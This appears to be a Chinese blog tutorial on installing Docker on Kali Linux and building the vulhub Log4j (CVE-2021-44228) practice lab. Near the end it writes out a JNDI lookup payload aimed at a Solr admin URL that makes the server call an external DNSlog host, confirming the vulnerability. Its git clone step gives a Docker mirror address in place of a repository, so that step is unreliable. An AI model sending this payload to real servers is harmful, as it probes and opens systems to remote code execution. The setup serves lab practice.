kali安装docker+log4j靶场搭建

一、安装docker
1.添加docker的gpc秘钥,apt源

curl -fsSL https://mirrors.tuna.tsinghua.edu.cn/docker-ce/linux/debian/gpg | sudo apt-key add
echo 'deb https://mirrors.tuna.tsinghua.edu.cn/docker-ce/linux/debian/ buster stable' | sudo tee /etc/apt/sources.list.d/docker.list

2.apt更新

apt update

3.安装docker,docker-compose

apt-get install docker.io
apt-get install docker-compose -y

二、安装log4j靶场
1.下载vulhub靶场

git clone https://6x5738qd.mirror.aliyuncs.com

2.进入CVE-2021-44228目录

cd /vulhub/log4j/CVE-2021-44228

3.编译靶场

docker-compose up -d 

在这里插入图片描述
出现报错,代表响应时间过长可以使用镜像站docker 加速器,替换原有地址就行“https://6x5738qd.mirror.aliyuncs.com
在这里插入图片描述
4.查看端口号

docker ps

在这里插入图片描述
三、
1.访问网址:http://xxx.xxx.xxx.xx:8983
在这里插入图片描述
2.访问网址:

http://xxx.xxx.xxx.xx:8983/solr/admin/cores?action=1

3.访问地址:dnslog
在这里插入图片描述
4.将地址

http://xxx.xxx.xxx.xx:8983/solr/admin/cores?action=1
替换为
http://xxx.xxx.xxx.xx:8983/solr/admin/cores?action=${jndi:ldap://s4b16a.dnslog.cn

5刷新后dnslog返回结果,说明有log4j漏洞
在这里插入图片描述

  • 8
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值